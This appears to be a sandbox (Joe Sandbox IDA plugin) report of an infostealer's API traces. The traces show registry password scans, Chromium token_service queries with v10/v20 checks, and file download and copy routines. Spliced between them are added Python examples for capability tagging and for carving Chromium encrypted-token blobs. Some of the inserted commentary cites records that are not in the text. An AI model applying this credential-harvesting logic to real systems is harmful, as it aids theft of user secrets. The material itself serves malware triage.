                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                            • String ID:
                                                            • API String ID: 4276352425-0
                                                            • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                            • Instruction ID: 4158661848786d2b51a9c44eb49494a0d5e03b6db320aeb1cc2c92dc8bf085f8
                                                            • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                            • Instruction Fuzzy Hash: AE7165B5960218ABCF14EBE0DC88EEE737AAF55300F444599A10FA2144EE755B84DF61
                                                            APIs
                                                            • memset.MSVCRT ref: 00407314
                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                            • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                              • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                            • task.LIBCPMTD ref: 00407555
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                            • String ID: Password
                                                            • API String ID: 2698061284-3434357891
                                                            • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                            • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                            • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                            • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                            APIs
                                                            • lstrcatA.KERNEL32(?,008790D8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                            • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                            • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                            • lstrcatA.KERNEL32(?,00845E28), ref: 00414847
                                                            • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                            • lstrcatA.KERNEL32(?,00879A58), ref: 0041486F
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                              • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                              • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                              • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                              • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                            • String ID: 0aA
                                                            • API String ID: 167551676-2786531170
                                                            • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                            • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                            • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                            • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008790F0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008790F0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                            • __aulldiv.LIBCMT ref: 00418172
                                                            • __aulldiv.LIBCMT ref: 00418180
                                                            • wsprintfA.USER32 ref: 004181AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                            • String ID: %d MB$@
                                                            • API String ID: 2886426298-3474575989
                                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022D6376
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D63AE
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022D63F6
                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022D641A
                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 022D6443
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022D6471
                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 022D64B0
                                                            • InternetCloseHandle.WININET(?), ref: 022D64BA
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D64C7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 4287319946-0
                                                            • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                            • Instruction ID: 587547d62c2b6e8abd2c63fb14d3436c13b1492aa1deaff21fe3c776ead07939
                                                            • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                            • Instruction Fuzzy Hash: AF517FB5A60318ABDF20DFE0DC44BEE7779AB44705F408098F605A72C4DBB46A89CF95
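The records above are raw IDA-plugin call traces, and four of them together show the behaviours that matter for triage: OpenProcess with 001FFFFF (PROCESS_ALL_ACCESS) in the function at 0041711C, the HKCU RegOpenKeyExA / RegEnumValueA / StrStrA("Password") scan at 0040733A-0040740D, the GetVolumeInformationA + wsprintfA fingerprint at 022E77E6, and the InternetOpenUrlA / CreateFileA / InternetReadFile / WriteFile download-to-disk loop at 022D63F6-022D6471. The script below is an added example written for this editorial pass, not Joe Sandbox output or code from the sample: it parses the "APIs" and "Strings" bullet lines of one record, decodes a hex-encoded string xref, and tags the record when one of those API sequences occurs in call order. The CAPABILITIES table, the tag names and the regex fitted to the record format are this example's own assumptions; the sample inputs are constructed from lines of this report. The hex string at xref 0041718C decodes to ASCII base64, and that in turn decodes to `{ "typ": "JWT", "alg": "EdDSA" }`; the report does not say what the code does with it, and the example only decodes it.

```python
# Added example (not Joe Sandbox code): triage helper for the "APIs"/"Strings" records above.
# It parses bullet lines like "• InternetReadFile.WININET(?,?,00000400,?), ref: 022D6443",
# decodes hex-encoded string xrefs, and tags a record that contains a known API sequence in order.
import base64
import re
from dataclasses import dataclass
from typing import Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"   # indirect calls are kept too
    r"(?P<api>[^.\s(]+)\.[A-Za-z0-9_]+"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRING_LINE = re.compile(r"^\s*•\s*(?P<text>.*?),\s*xrefs:\s*[0-9A-F, ]+$")
HEX_BYTES = re.compile(r"^(?:[0-9A-Fa-f]{2}(?: |$))+$")

# Ordered (api, required argument or None) sequences; table and names are this example's choice.
CAPABILITIES = {
    "download_to_file": [("InternetOpenUrlA", None), ("CreateFileA", None),
                         ("InternetReadFile", None), ("WriteFile", None)],
    "registry_credential_scan": [("RegOpenKeyExA", "80000001"),  # HKEY_CURRENT_USER
                                 ("RegEnumValueA", None), ("StrStrA", "Password")],
    "volume_serial_fingerprint": [("GetVolumeInformationA", None), ("wsprintfA", None)],
    "open_process_all_access": [("OpenProcess", "001FFFFF")],  # PROCESS_ALL_ACCESS
}


@dataclass
class ApiCall:
    api: str
    args: list[str]
    ref: str


def parse_record(text: str) -> tuple[list[ApiCall], list[str]]:
    """Read one function record (APIs and Strings) up to its 'Memory Dump Source' header."""
    calls, strings, section = [], [], None
    for line in text.splitlines():
        head = line.strip()
        if head in ("APIs", "Strings"):
            section = head
        elif head == "Memory Dump Source":
            break
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            calls.append(ApiCall(m["api"], args, m["ref"]))
        elif section == "Strings" and (m := STRING_LINE.match(line)):
            strings.append(m["text"])
    return calls, strings


def decode_hex_string(text: str) -> Optional[str]:
    """Turn '65 79 41 ...' into text; if that text is itself base64, peel that layer as well."""
    if not HEX_BYTES.match(text.strip()):
        return None
    raw = bytes.fromhex(text.replace(" ", "")).decode("latin-1")
    try:
        inner = base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True).decode("utf-8")
        return inner if inner.isprintable() else raw
    except (ValueError, UnicodeDecodeError):
        return raw


def tag_capabilities(calls: list[ApiCall]) -> set[str]:
    """A tag fires when its sequence is an ordered subsequence of the record's calls."""
    tags = set()
    for name, pattern in CAPABILITIES.items():
        i = 0
        for call in calls:
            api, arg = pattern[i]
            if call.api == api and (arg is None or arg in call.args):
                i += 1
                if i == len(pattern):
                    tags.add(name)
                    break
    return tags


# Constructed input: lines copied from the OpenProcess and WinINet records of this report.
SAMPLE_OPENPROCESS = """APIs
• ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
• OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
• memset.MSVCRT ref: 0041716A
Strings
• 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
Memory Dump Source
"""
SAMPLE_DOWNLOAD = """APIs
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022D63F6
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022D641A
• InternetReadFile.WININET(?,?,00000400,?), ref: 022D6443
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022D6471
Memory Dump Source
"""
```

Usage: paste one record's text (from its "APIs" line through "Memory Dump Source") into parse_record, pass the calls to tag_capabilities and the strings to decode_hex_string. "Part of subcall function" lines are kept in the sequence on purpose, because the behaviour is reachable from the record's function even when the call sits one level down; drop the optional prefix in API_LINE to restrict tags to direct calls.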
                                                            APIs
                                                            • memset.MSVCRT ref: 022E4FEE
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E5017
                                                            • lstrcat.KERNEL32(?,00421000), ref: 022E5034
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                                              • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                                            • memset.MSVCRT ref: 022E507A
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E50A3
                                                            • lstrcat.KERNEL32(?,00421020), ref: 022E50C0
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                                              • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                                              • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                                            • memset.MSVCRT ref: 022E5106
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E512F
                                                            • lstrcat.KERNEL32(?,00421038), ref: 022E514C
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C17
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022E4C2C
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C49
                                                              • Part of subcall function 022E4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022E4C85
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,0064A524), ref: 022E4CB1
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022E4CC3
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CD7
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022E4CE9
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CFD
                                                              • Part of subcall function 022E4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022E4D13
                                                              • Part of subcall function 022E4B77: DeleteFileA.KERNEL32(?), ref: 022E4D98
                                                            • memset.MSVCRT ref: 022E5192
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID:
                                                            • API String ID: 4017274736-0
                                                            • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                            • Instruction ID: db05b167b2f9cd16b0adcd5423be81d2d0db33ff3aefd49a6bcb9afd82be81d1
                                                            • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                            • Instruction Fuzzy Hash: 4741D679A5031467DB10F7F0EC46FED3739AB24701F804494B68A660C4EEB897D88F92
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022E8397
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E839E
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022E83BF
                                                            • __aulldiv.LIBCMT ref: 022E83D9
                                                            • __aulldiv.LIBCMT ref: 022E83E7
                                                            • wsprintfA.USER32 ref: 022E8413
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                            • String ID: @
                                                            • API String ID: 2774356765-2766056989
                                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction ID: 2b9d2c89cc79d323a96f5a89d2ba8a7fd6ae12c1c4badfe6e585ced312a11b55
                                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction Fuzzy Hash: 29214AB1E54218ABDB00DFD4DC49FAEB7B9FB44B04F504609F616BB284C7B869008BA5
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                            • API String ID: 1440504306-1079375795
                                                            • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                            • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                            • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                            • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess$DefaultLangUser
                                                            • String ID: B
                                                            • API String ID: 1494266314-2248957098
                                                            • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                            • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                            • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                            • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                            APIs
                                                            • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                            • memset.MSVCRT ref: 00409EE8
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                            • API String ID: 1977917189-1096346117
                                                            • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                            • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                            • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                            • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
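The two functions above read rows with "SELECT service, encrypted_token FROM token_service" (Chromium's Web Data database), look for "AccountId" in the service name, and then memcmp the first three bytes of each blob against "v20" and "v10" before either handling the token locally or taking the ERROR_RUN_EXTRACTOR branch. Added example, not code from the sample or from Joe Sandbox: a Python parser that carves the blobs the same way the stealer classifies them. The layout it assumes (3-byte ASCII version prefix, 12-byte AES-GCM nonce, ciphertext, 16-byte GCM tag) is Chromium's OSCrypt format on Windows; the sample rows, the AccountId values and the blob contents are constructed.

```python
"""Split Chromium OSCrypt blobs the way the sample's memcmp(?, "v10", 3) and
memcmp(?, "v20", 3) do. Added example, not code from the sample or the report.
Layout assumed (Chromium OSCrypt on Windows): 3-byte ASCII version prefix,
12-byte AES-GCM nonce, ciphertext, 16-byte GCM tag."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

PREFIX_LEN, NONCE_LEN, TAG_LEN = 3, 12, 16
# v10: key stored DPAPI-wrapped in Local State; v20: app-bound key
KNOWN_VERSIONS = (b"v10", b"v20")


@dataclass(frozen=True)
class OSCryptBlob:
    version: str
    nonce: bytes
    ciphertext: bytes
    tag: bytes


def parse_oscrypt_blob(blob: bytes) -> OSCryptBlob:
    """Carve prefix/nonce/ciphertext/tag; reject unknown or truncated blobs."""
    prefix = blob[:PREFIX_LEN]
    if prefix not in KNOWN_VERSIONS:
        raise ValueError(f"unknown prefix {prefix!r}")
    body = blob[PREFIX_LEN:]
    if len(body) < NONCE_LEN + TAG_LEN:
        raise ValueError("blob shorter than nonce + tag")
    return OSCryptBlob(
        version=prefix.decode("ascii"),
        nonce=body[:NONCE_LEN],
        ciphertext=body[NONCE_LEN:len(body) - TAG_LEN],
        tag=body[len(body) - TAG_LEN:],
    )


def triage_token_rows(rows: Iterable[Tuple[str, bytes]]) -> Dict[str, List[str]]:
    """Group the `service` column of token_service rows by which key opens them:
    'v10' (Local State key), 'v20' (app-bound key, the report's
    ERROR_RUN_EXTRACTOR branch) or 'other' (not an OSCrypt blob at all)."""
    groups: Dict[str, List[str]] = {"v10": [], "v20": [], "other": []}
    for service, blob in rows:
        try:
            groups[parse_oscrypt_blob(blob).version].append(service)
        except ValueError:
            groups["other"].append(service)
    return groups


# Constructed rows standing in for
#   SELECT service, encrypted_token FROM token_service
# Real rows carry a GAIA id after "AccountId-"; these ids and blobs are made up.
SAMPLE_ROWS: List[Tuple[str, bytes]] = [
    ("AccountId-1001", b"v10" + bytes(range(12)) + b"\x11" * 20 + bytes(16)),
    ("AccountId-1002", b"v20" + bytes(12) + b"\xaa" * 8 + b"\xff" * 16),
    ("AccountId-1003", b"not-an-oscrypt-blob"),
]

if __name__ == "__main__":
    print(triage_token_rows(SAMPLE_ROWS))
```

The parser deliberately stops at carving: a v10 blob still needs the AES-GCM key from the profile's Local State, and a v20 blob needs the app-bound key, which is why the sample has a separate extractor path for that case. Running the triage over a copied Web Data database tells you which accounts a given build could actually have decrypted on the victim.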
                                                            APIs
                                                              • Part of subcall function 022D7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                                              • Part of subcall function 022D7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                                              • Part of subcall function 022D7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                                              • Part of subcall function 022D7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
